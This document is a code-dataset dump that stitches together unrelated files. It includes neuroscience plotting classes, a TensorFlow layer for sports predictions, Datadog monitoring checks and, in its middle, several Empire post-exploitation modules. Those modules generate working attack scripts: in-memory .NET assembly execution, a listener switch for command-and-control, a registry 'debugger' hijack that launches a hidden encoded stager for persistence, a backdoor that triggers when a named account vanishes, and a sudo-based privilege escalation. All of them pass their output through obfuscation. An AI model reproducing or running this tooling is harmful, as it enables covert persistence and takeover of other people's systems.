# (use rectangles instead of markers because some markers don't show up well)
labels = []
handles = []
for popIndex, popLabel in enumerate(popLabels):
if legendLabels:
labels.append(legendLabels[popIndex])
else:
labels.append(popLabel)
handles.append(mpatches.Rectangle((0, 0), 1, 1, fc=popColors[popLabel]))
# Set up the default legend settings
legendKwargs = {}
legendKwargs['title'] = 'Populations'
legendKwargs['bbox_to_anchor'] = (1.025, 1)
legendKwargs['loc'] = 2
legendKwargs['borderaxespad'] = 0.0
legendKwargs['handlelength'] = 0.5
legendKwargs['fontsize'] = 'small'
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_input = kwargs['legendKwargs']
kwargs.pop('legendKwargs')
for key, value in legendKwargs_input.items():
if key in legendKwargs:
legendKwargs[key] = value
# Add the legend
rasterPlotter.addLegend(handles, labels, **legendKwargs)
# Adjust the plot to make room for the legend
rightOffset = 0.8
maxLabelLen = max([len(label) for label in popLabels])
rasterPlotter.fig.subplots_adjust(right=(rightOffset - 0.012 * maxLabelLen))
# It is often useful to invert the ordering of cells, so positions match the legend
if orderInverse:
rasterPlotter.axis.invert_yaxis()
# Generate the figure
rasterPlot = rasterPlotter.plot(**axisArgs, **kwargs)
# Default is to return the figure, but you can also return the plotter
if returnPlotter:
return rasterPlotter
else:
return rasterPlot
```
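Building on the docstring's examples, here is a hedged sketch of calling `plotRaster` with pre-computed spike data instead of a live NetPyNE sim; the spike times, indices, and population sizes are toy values.
```python
from netpyne.plotting import plotRaster

# Toy data: two populations of 2 and 3 cells
spkTimes = [5.0, 12.5, 40.0, 41.2, 77.7, 90.1]
spkInds = [0, 3, 1, 4, 2, 0]
popNumCells = [2, 3]
popLabels = ['popA', 'popB']

# List/tuple input: (spike times, spike indices, popNumCells, popLabels), per the docstring
fig = plotRaster(
    rasterData=(spkTimes, spkInds, popNumCells, popLabels),
    orderInverse=True,   # top-down ordering so positions match the legend
    saveFig=False,
    showFig=True,
)
```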
#### File: netpyne/plotting/plotter.py
```python
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
plt.ion()
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00],
[0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00],
[0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00],
[0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, axis=None, sim=None, rcParams=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin,
"""
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParams)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
self.fig, self.axis = plt.subplots(figsize=figSize)
else:
self.fig = plt.gcf()
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=sim)
return self.data
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
def saveFig(self, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.type
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
plt.close(self.fig)
dummy = plt.figure(figsize=self.rcParams['figure.figsize'])
new_manager = dummy.canvas.manager
new_manager.canvas.figure = self.fig
self.fig.set_canvas(new_manager.canvas)
self.fig.show()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def finishFig(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.type = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishFig(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for line plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.type = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
self.formatAxis(**kwargs)
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishFig(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.type = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
#self.formatAxis(**kwargs)
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishFig(**kwargs)
return self.fig
"""
Types of plot:
line
scatter
matrix
bar
pie
Plots:
plot2Dnet scatter
plotConn matrix, bar, pie
plotCSD
plotEPSPAmp
plotfI
plotLFP
plotRaster scatter
plotRatePSD
plotRates
plotRateSpectrogram
plotRxDConcentration
plotShape
plotSpikeHist
plotSpikeStats
plotSyncs
plotTraces line
"""
```
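The plotter classes above can also be driven directly. A minimal sketch using `ScatterPlotter` with dummy data (note that the constructor still imports the NetPyNE `sim` object internally, and `saveFig` would fall back to `sim.cfg.filename`):
```python
import numpy as np
from netpyne.plotting.plotter import ScatterPlotter

rng = np.random.default_rng(0)
data = {
    'x': rng.uniform(0, 100, 50),    # e.g. spike times
    'y': rng.integers(0, 20, 50),    # e.g. cell indices
    'c': 'k', 's': 5, 'marker': '|', 'linewidth': 2,
    'cmap': None, 'norm': None, 'alpha': None, 'linewidths': None,
}

plotter = ScatterPlotter(data=data)
fig = plotter.plot(title='Demo scatter', xlabel='Time (ms)', ylabel='Cells',
                   saveFig=False, showFig=True)
```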
{
"source": "joewilaj/sportsGNNs",
"score": 2
}
#### File: nbaGNNs/src/extract_team_GAT.py
```python
from __future__ import absolute_import
from tensorflow.keras import activations, constraints, initializers, regularizers
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Layer, Dropout, LeakyReLU, Dense, Concatenate,Reshape
import tensorflow as tf
import numpy as np
import pdb
#Custom Layer to extract offense and defense nodes for home and away teams
class Game_Vec(Layer):
def __init__(self,attention_feat_size):
super(Game_Vec,self).__init__()
self.feat_dim = attention_feat_size
def call(self,inputs):
defense_index = tf.math.add(inputs[0],tf.constant([31,31],dtype = tf.int64))
off = tf.gather(inputs[1],inputs[0], axis=1)
defense = tf.gather(inputs[1],defense_index, axis=1)
vegas = tf.gather(inputs[2],inputs[0], axis=1)
game_vec = tf.concat([off,defense,vegas],axis = 2)
return game_vec
class Game_Vec_D(Layer):
def __init__(self,attention_feat_size):
super(Game_Vec_D,self).__init__()
self.feat_dim = attention_feat_size
def call(self,inputs):
defense_index = tf.math.add(inputs[0],tf.constant([31,31],dtype = tf.int64))
off = tf.gather(inputs[1],inputs[0], axis=1)
defense = tf.gather(inputs[1],defense_index, axis=1)
vegas = tf.gather(inputs[2],inputs[0], axis=1)
model = tf.gather(inputs[3],inputs[0], axis=1)
game_vec = tf.concat([off,defense,vegas,model],axis = 2)
return game_vec
class To_Sparse(Layer):
def __init__(self,):
super(To_Sparse,self).__init__()
def call(self,inputs):
sparse_t = tf.sparse.from_dense(inputs[0], name = 'adj_mat')
return sparse_t
```
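A quick shape check of the custom layers above with dummy tensors. The node layout (offense nodes followed by defense nodes, offset by 31 along axis 1) is inferred from the `[31, 31]` constant; the batch size, node count, and feature sizes are made up.
```python
import tensorflow as tf
from extract_team_GAT import Game_Vec   # assumes running from nbaGNNs/src

# Dummy batch: 64 node slots (offense ~0-30, defense ~31-61), 16-dim node features,
# plus a 4-dim "vegas" feature block per node.
nodes = tf.random.normal((1, 64, 16))
vegas = tf.random.normal((1, 64, 4))
teams = tf.constant([3, 17], dtype=tf.int64)   # offense-node indices for home and away

game_vec = Game_Vec(16)([teams, nodes, vegas])
print(game_vec.shape)   # (1, 2, 36): 16 offense + 16 defense + 4 vegas features per team
```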
{
"source": "joewildiml/Empire",
"score": 2
}
#### File: src/menus/ChatMenu.py
```python
import socketio.exceptions
from empire.client.src.EmpireCliState import state
from empire.client.src.MenuState import menu_state
from empire.client.src.menus.Menu import Menu
from empire.client.src.utils import print_util
from empire.client.src.utils.autocomplete_util import position_util
from empire.client.src.utils.cli_util import register_cli_commands
@register_cli_commands
class ChatMenu(Menu):
def __init__(self):
super().__init__(display_name='chat', selected='')
self.my_username = ''
state.chat_cache = []
def autocomplete(self):
return self._cmd_registry + super().autocomplete()
def get_completions(self, document, complete_event, cmd_line, word_before_cursor):
if position_util(cmd_line, 1, word_before_cursor):
yield from super().get_completions(document, complete_event, cmd_line, word_before_cursor)
def get_prompt(self) -> str:
return f"<b><ansigreen>{state.me['username']}</ansigreen></b>: "
def on_connect(self):
state.sio.on('chat/join', self.on_chat_join)
state.sio.on('chat/leave', self.on_chat_leave)
state.sio.on('chat/message', self.on_chat_message)
state.sio.emit('chat/history')
state.sio.emit('chat/join')
def on_disconnect(self):
if state.sio is not None:
try:
state.sio.emit('chat/leave')
except socketio.exceptions.BadNamespaceError:
print(print_util.color("[!] Unable to reach server"))
def on_enter(self):
print(print_util.color('[*] Exit Chat Menu with Ctrl+C'))
self.my_username = state.me['username']
for message in state.chat_cache:
print(message)
state.chat_cache = []
return True
@staticmethod
def is_chat_active():
return menu_state.current_menu_name == 'ChatMenu'
def on_chat_join(self, data):
message = print_util.color('[+] ' + data['message'])
if self.is_chat_active():
print(message)
else:
state.chat_cache.append(message)
def on_chat_leave(self, data):
message = print_util.color('[+] ' + data['message'])
if self.is_chat_active():
print(message)
else:
state.chat_cache.append(message)
def on_chat_message(self, data):
if data['username'] != state.me['username'] or data.get('history') is True:
if data['username'] == state.me['username']:
message = print_util.color(data['username'], 'green') + ': ' + data['message']
if self.is_chat_active():
print(message)
else:
state.chat_cache.append(print_util.color(message))
else:
message = print_util.color(data['username'], 'red') + ': ' + data['message']
if self.is_chat_active():
print(message)
else:
state.chat_cache.append(message)
def send_chat(self, text):
state.sio.emit('chat/message', {'message': text})
chat_menu = ChatMenu()
```
#### File: powershell/code_execution/invoke_assembly.py
```python
from __future__ import print_function
import pathlib
import base64
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Helper function for arguments
def parse_assembly_args(args):
stringlist = []
stringbuilder = ""
inside_quotes = False
if not args:
return '""'
for ch in args:
if ch == " " and not inside_quotes:
stringlist.append(stringbuilder) # Add finished string to the list
stringbuilder = "" # Reset the string
elif ch == '"':
inside_quotes = not inside_quotes
else: # Ch is a normal character
stringbuilder += ch # Add next ch to string
# Finally...
stringlist.append(stringbuilder)
for arg in stringlist:
if arg == "":
stringlist.remove(arg)
argument_string = '","'.join(stringlist)
# Replace backslashes with a literal backslash so an operator can type a file path like C:\windows\system32 instead of C:\\windows\\system32
argument_string = argument_string.replace("\\", "\\\\")
return f'\"{argument_string}\"'
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-Assembly.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
try:
with open(f"{main_menu.installPath}/downloads/{params['File']}", 'rb') as f:
assembly_data = f.read()
except:
return handle_error_message("[!] Could not read .NET assembly path at: " + str(params['Arguments']))
encode_assembly = helpers.encode_base64(assembly_data).decode('UTF-8')
# Do some parsing on the operator's arguments so it can be formatted for Powershell
if params['Arguments'] != '':
assembly_args = parse_assembly_args(params['Arguments'])
script_end = f'\nInvoke-Assembly -ASMdata "{encode_assembly}"'
# Add any arguments to the end execution of the script
if params['Arguments'] != '':
script_end += " -" + "Arguments" + " " + assembly_args
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
```
#### File: powershell/management/switch_listener.py
```python
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict, Optional, Tuple
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "") -> Tuple[Optional[str], Optional[str]]:
# extract all of our options
listener_name = params['Listener']
if listener_name not in main_menu.listeners.activeListeners:
return handle_error_message("[!] Listener '%s' doesn't exist!" % (listener_name))
active_listener = main_menu.listeners.activeListeners[listener_name]
listener_options = active_listener['options']
script = main_menu.listeners.loadedListeners[active_listener['moduleName']].generate_comms(listenerOptions=listener_options, language='powershell')
# signal the existing listener that we're switching listeners, and the new comms code
script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (listener_name, script)
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
```
#### File: persistence/misc/debugger.py
```python
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
# management options
cleanup = params['Cleanup']
trigger_binary = params['TriggerBinary']
listener_name = params['Listener']
target_binary = params['TargetBinary']
# storage options
reg_path = params['RegPath']
# staging options
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
status_msg = ""
locationString = ""
if cleanup.lower() == 'true':
# the registry command to disable the debugger for Utilman.exe
script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s';'%s debugger removed.'" %(target_binary, target_binary)
script = data_util.keyword_obfuscation(script)
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
return script
if listener_name != '':
# if there's a listener specified, generate a stager and store it
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# generate the PowerShell one-liner
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', obfuscate=obfuscate,
obfuscationCommand=obfuscate_command,
bypasses=params['Bypasses'])
enc_script = launcher.split(" ")[-1]
# statusMsg += "using listener " + listenerName
path = "\\".join(reg_path.split("\\")[0:-1])
name = reg_path.split("\\")[-1]
status_msg += " stored in " + reg_path + "."
script = "$RegPath = '"+reg_path+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+enc_script+";"
# note where the script is stored
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+target_binary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+target_binary+"' -Name Debugger -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \\\"-enc $x\\\" powershell\";exit;';'"+target_binary+" debugger set to trigger stager for listener "+listener_name+"'"
else:
# the registry command to set the debugger for the specified binary to be the binary path specified
script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+target_binary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+target_binary+"' -Name Debugger -Value '"+trigger_binary+"';'"+target_binary+" debugger set to "+trigger_binary+"'"
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
```
#### File: persistence/powerbreach/deaduser.py
```python
from __future__ import print_function
import pathlib
import os
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
script = """
function Invoke-DeadUserBackdoor
{
Param(
[Parameter(Mandatory=$False,Position=1)]
[int]$Timeout=0,
[Parameter(Mandatory=$False,Position=2)]
[int] $Sleep=30,
[Parameter(Mandatory=$True,Position=3)]
[string] $Username,
[Parameter(Mandatory=$False,Position=4)]
[switch] $Domain
)
$running=$True
$match =""
$starttime = Get-Date
while($running)
{
if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
{
$running=$False
}
if($Domain)
{
$UserSearcher = [adsisearcher]"(&(samAccountType=805306368)(samAccountName=*$UserName*))"
$UserSearcher.PageSize = 1000
$count = @($UserSearcher.FindAll()).Count
if($count -eq 0)
{
Write-Verbose "Domain user $Username not found!"
$match=$True
}
}
else
{
$comp = $env:computername
[ADSI]$server="WinNT://$comp"
$usercheck = $server.children | where{$_.schemaclassname -eq "user" -and $_.name -eq $Username}
if(-not $usercheck)
{
$match=$True
}
}
if($match)
{
REPLACE_LAUNCHER
$running=$False
}
else
{
Start-Sleep -s $Sleep
}
}
}
Invoke-DeadUserBackdoor"""
listener_name = params['Listener']
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# set the listener value for the launcher
stager = main_menu.stagers.stagers["multi/launcher"]
stager.options['Listener'] = listener_name
stager.options['Base64'] = "False"
# and generate the code
stager_code = stager.generate()
if stager_code == "":
return handle_error_message('[!] Error creating stager')
else:
script = script.replace("REPLACE_LAUNCHER", stager_code)
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values)
out_file = params['OutFile']
if out_file != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(out_file)) and os.path.dirname(out_file) != '':
os.makedirs(os.path.dirname(out_file))
f = open(out_file, 'w')
f.write(script)
f.close()
return handle_error_message("[+] PowerBreach deaduser backdoor written to " + out_file)
script = data_util.keyword_obfuscation(script)
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stager_code = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stager_code.split(" ")
# set up the start-process command so no new windows appears
script = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:]))
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
```
#### File: privesc/multi/sudo_spawn.py
```python
from __future__ import print_function
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common.module_models import PydanticModule
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# extract all of our options
listener_name = params['Listener']
user_agent = params['UserAgent']
safe_checks = params['SafeChecks']
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(listener_name, language='python', userAgent=user_agent, safeChecks=safe_checks)
if launcher == "":
return handle_error_message("[!] Error in launcher command generation.")
else:
password = params['Password']
launcher = launcher.replace('"', '\\"')
launcher = launcher.replace('echo', '')
parts = launcher.split("|")
launcher = "python3 -c %s" % (parts[0])
script = 'import subprocess; subprocess.Popen("echo \\"%s\\" | sudo -S %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (password, launcher)
return script
``` |
{
"source": "joewilliams/dd-agent",
"score": 2
} |
#### File: dd-agent/checks.d/gearmand.py
```python
import gearman
# project
from checks import AgentCheck
class Gearman(AgentCheck):
SERVICE_CHECK_NAME = 'gearman.can_connect'
def get_library_versions(self):
return {"gearman": gearman.__version__}
def _get_client(self,host,port):
self.log.debug("Connecting to gearman at address %s:%s" % (host, port))
return gearman.GearmanAdminClient(["%s:%s" %
(host, port)])
def _get_metrics(self, client, tags):
data = client.get_status()
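        # get_status() returns one entry per registered task; each entry is
        # expected to expose 'running', 'queued' and 'workers' counts (and,
        # per the python-gearman admin client, typically a 'task' name),
        # which are summed below.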
running = 0
queued = 0
workers = 0
for stat in data:
running += stat['running']
queued += stat['queued']
workers += stat['workers']
unique_tasks = len(data)
self.gauge("gearman.unique_tasks", unique_tasks, tags=tags)
self.gauge("gearman.running", running, tags=tags)
self.gauge("gearman.queued", queued, tags=tags)
self.gauge("gearman.workers", workers, tags=tags)
self.log.debug("running %d, queued %d, unique tasks %d, workers: %d"
% (running, queued, unique_tasks, workers))
def _get_conf(self, instance):
host = instance.get('server', None)
port = instance.get('port', None)
if host is None:
self.warning("Host not set, assuming 127.0.0.1")
host = "127.0.0.1"
if port is None:
self.warning("Port is not set, assuming 4730")
port = 4730
tags = instance.get('tags', [])
return host, port, tags
def check(self, instance):
self.log.debug("Gearman check start")
host, port, tags = self._get_conf(instance)
service_check_tags = ["server:{0}".format(host),
"port:{0}".format(port)]
client = self._get_client(host, port)
self.log.debug("Connected to gearman")
tags += service_check_tags
try:
self._get_metrics(client, tags)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK,
message="Connection to %s:%s succeeded." % (host, port),
tags=service_check_tags)
except Exception as e:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
message=str(e), tags=service_check_tags)
raise
```
#### File: dd-agent/checks.d/postfix.py
```python
import os
# project
from checks import AgentCheck
from utils.subprocess_output import get_subprocess_output
class PostfixCheck(AgentCheck):
"""This check provides metrics on the number of messages in a given postfix queue
WARNING: the user that dd-agent runs as must have sudo access for the 'find' command
sudo access is not required when running dd-agent as root (not recommended)
example /etc/sudoers entry:
dd-agent ALL=(ALL) NOPASSWD:/usr/bin/find
YAML config options:
"directory" - the value of 'postconf -h queue_directory'
"queues" - the postfix mail queues you would like to get message count totals for
"""
def check(self, instance):
config = self._get_config(instance)
directory = config['directory']
queues = config['queues']
tags = config['tags']
self._get_queue_count(directory, queues, tags)
def _get_config(self, instance):
directory = instance.get('directory', None)
queues = instance.get('queues', None)
tags = instance.get('tags', [])
if not queues or not directory:
raise Exception('missing required yaml config entry')
instance_config = {
'directory': directory,
'queues': queues,
'tags': tags,
}
return instance_config
def _get_queue_count(self, directory, queues, tags):
for queue in queues:
queue_path = os.path.join(directory, queue)
if not os.path.exists(queue_path):
raise Exception('%s does not exist' % queue_path)
count = 0
if os.geteuid() == 0:
# dd-agent is running as root (not recommended)
count = sum(len(files) for root, dirs, files in os.walk(queue_path))
else:
# can dd-agent user run sudo?
test_sudo = os.system('setsid sudo -l < /dev/null')
if test_sudo == 0:
output, _, _ = get_subprocess_output(['sudo', 'find', queue_path, '-type', 'f'], self.log)
count = len(output.splitlines())
else:
raise Exception('The dd-agent user does not have sudo access')
# emit an individually tagged metric
self.gauge('postfix.queue.size', count, tags=tags + ['queue:%s' % queue, 'instance:%s' % os.path.basename(directory)])
# these can be retrieved in a single graph statement
# for example:
# sum:postfix.queue.size{instance:postfix-2,queue:incoming,host:hostname.domain.tld}
```
#### File: dd-agent/checks.d/powerdns_recursor.py
```python
from collections import namedtuple
# Datadog
from checks import AgentCheck
# 3p
import requests
class PowerDNSRecursorCheck(AgentCheck):
